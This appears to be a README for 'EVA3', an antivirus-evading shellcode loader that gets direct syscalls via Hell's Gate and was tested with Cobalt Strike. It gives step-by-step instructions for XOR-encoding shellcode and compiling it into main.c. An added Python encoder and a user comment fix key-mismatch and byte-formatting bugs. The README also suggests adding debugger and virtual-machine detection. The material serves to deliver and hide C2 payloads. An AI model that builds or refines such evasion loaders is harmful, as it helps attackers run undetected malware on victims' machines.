EVA3: using hellsgate in EVA to get the syscalls [tested with cobalt strike 4.3]

 Note that I don't claim the idea is mine; this repo is probably just a
 fork, but I wanted to show other ways of getting syscalls.

USAGE:

1- copy your x64 shellcode into the encoder.py file

2- change the XOR key if you want, but remember to change it in main.c too (the same value on both sides, hex or decimal)

3- run encoder.py as follows: python2 encoder.py

4- copy the generated (encoded) shellcode into the 'shellcode' variable in main.c

5- compile with Visual Studio as a Release x64 build
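The encode step above and the decode step in main.c only work if the key and the byte formatting agree on both sides. The following is an added Python 3 example, not the repo's encoder.py: it XOR-encodes a constructed sample buffer (not real shellcode), emits it as a zero-padded `\xHH` C string together with a matching `#define` for the key, and parses the escaped string back the way a C compiler would, so the round trip can be checked before anything is pasted into main.c. The names `xor_encode`, `to_c_source`, `from_c_escaped` and the constant `KEY` are mine, not the project's.

```python
"""Added example (not EVA3's encoder.py): XOR-encode shellcode and emit it
in the escaped-string form a C loader expects, keeping the key in one place.
"""
import re

# Single source of truth for the key. Note 0x69 == 105, not 69: mixing a hex
# literal in Python with a decimal literal in C silently corrupts every byte.
KEY = 0x69

# Constructed sample buffer (NOT real shellcode). It deliberately covers the
# edge cases: a byte equal to the key (-> 0x00 after XOR) and bytes whose XOR
# result is a single hex digit (0x03, 0x04).
SAMPLE_SHELLCODE = bytes([0xFC, 0x48, 0x83, 0xE4, 0xF0, 0x69, 0x6A, 0x00, 0x01, 0x6D])

_ESC = re.compile(r"\\x([0-9a-fA-F]+)")


def xor_encode(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with a single-byte key."""
    if not 0 <= key <= 0xFF:
        raise ValueError("expected a single-byte key, got %r" % (key,))
    return bytes(b ^ key for b in data)


def xor_decode(data: bytes, key: int = KEY) -> bytes:
    """XOR is its own inverse; this mirrors `shellcode[i] ^ KEY` in main.c."""
    return xor_encode(data, key)


def to_c_escaped(data: bytes) -> str:
    """Always two hex digits per byte: \\x03, never \\x3."""
    return "".join("\\x{:02x}".format(b) for b in data)


def to_c_source(data: bytes, key: int = KEY, name: str = "shellcode") -> str:
    """Emit the encoded buffer plus a key define and an explicit length.

    The length is emitted separately because the encoded buffer can contain
    \\x00 (any byte equal to the key), so strlen()/sizeof tricks are unsafe.
    """
    enc = xor_encode(data, key)
    return (
        "#define XOR_KEY {0}  /* {0} == 0x{0:02x} */\n"
        "unsigned char {1}[] = \"{2}\";\n"
        "size_t {1}_len = {3};\n"
    ).format(key, name, to_c_escaped(enc), len(enc))


def from_c_escaped(s: str) -> bytes:
    """Parse \\xHH escapes the way a C compiler does.

    C's \\x escape is greedy: it consumes every hex digit that follows, with
    no width limit. "\\x3\\x1" therefore decodes to [0x03, 0x01] because the
    backslash terminates the first escape, but "\\x31" is ONE byte (0x31).
    Unpadded output is only safe as long as every byte is written as an
    escape; zero-padding removes the dependency on what comes next.
    """
    out = []
    for m in _ESC.finditer(s):
        value = int(m.group(1), 16)
        if value > 0xFF:
            raise ValueError("escape does not fit in a byte: " + m.group(0))
        out.append(value)
    return bytes(out)


def round_trips(data: bytes, key: int = KEY) -> bool:
    """Encode -> C string -> C-style parse -> decode must give the input back."""
    encoded_c = to_c_escaped(xor_encode(data, key))
    return xor_decode(from_c_escaped(encoded_c), key) == data


if __name__ == "__main__":
    print(to_c_source(SAMPLE_SHELLCODE))
    print("round trip ok:", round_trips(SAMPLE_SHELLCODE))
```

The generated `#define XOR_KEY` line is meant to be pasted into main.c next to the `shellcode` array so the decode loop uses `shellcode[i] ^ XOR_KEY` rather than a retyped literal; that is the drift the comment below ran into.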

BASED ON:

I actually don't know whether it can bypass some AVs, but it's a nice approach worth some attention. If you want to add other things, like detecting debuggers or virtual environments, it will be a cool way to sharpen your skills; you can look at EVA2 for some functions.

Comments
  • 2 changes to make it work

    First of all, great work. Very nice tool. Thank you a lot for sharing.

    I had to make 2 changes to make it work.

    1. encoder.py:

    If the XOR result is 0x03 for a certain byte, you print 0x3, which doesn't work when you transfer the payload to main.cpp.

    Changing

    print("".join(["\\x{0}".format(hex(abs(i)).replace("0x", "")) for i in encoded_shellcode]))

    to

    print("".join(["\\x{:02x}".format(abs(i)) for i in encoded_shellcode]))

    helped me.

    2. main.cpp

    I had to change line

    char DecodedOpCode = shellcode[i] ^ 69;

    to

    char DecodedOpCode = shellcode[i] ^ 105;

    This is because in encoder.py we XOR with a hex value, and in main.cpp with a decimal value.

    Update:

    Changing issue 1 is not necessary since after solving issue 2 I recognized that even bytes like \x3 work :-)

    I hope this will be helpful for the one or the other.

    Cheerz.
